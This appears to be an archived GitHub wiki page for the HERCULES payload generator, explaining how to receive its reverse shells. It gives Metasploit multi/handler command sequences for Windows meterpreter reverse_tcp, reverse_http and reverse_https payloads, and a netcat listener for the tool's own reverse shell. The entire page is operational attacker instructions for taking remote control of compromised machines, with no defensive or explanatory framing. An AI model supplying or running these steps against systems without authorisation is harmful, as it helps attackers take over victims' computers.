Skip to content
This repository has been archived by the owner on Feb 14, 2023. It is now read-only.

Payload Usage

Ege Balcı edited this page Jul 25, 2016 · 1 revision

#Meterpreter Reverse TCP

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport "Local Port Here"
set lhost "Local Ip Here"
run

#Meterpreter Reverse HTTP

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport "Local Port Here"
set lhost "Local Ip Here"
run

#Meterpreter Reverse HTTPS

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lport "Local Port Here"
set lhost "Local Ip Here"
run

#HERCULES REVERSE SHELL

nc -l -p "Local Port Here"
Clone this wiki locally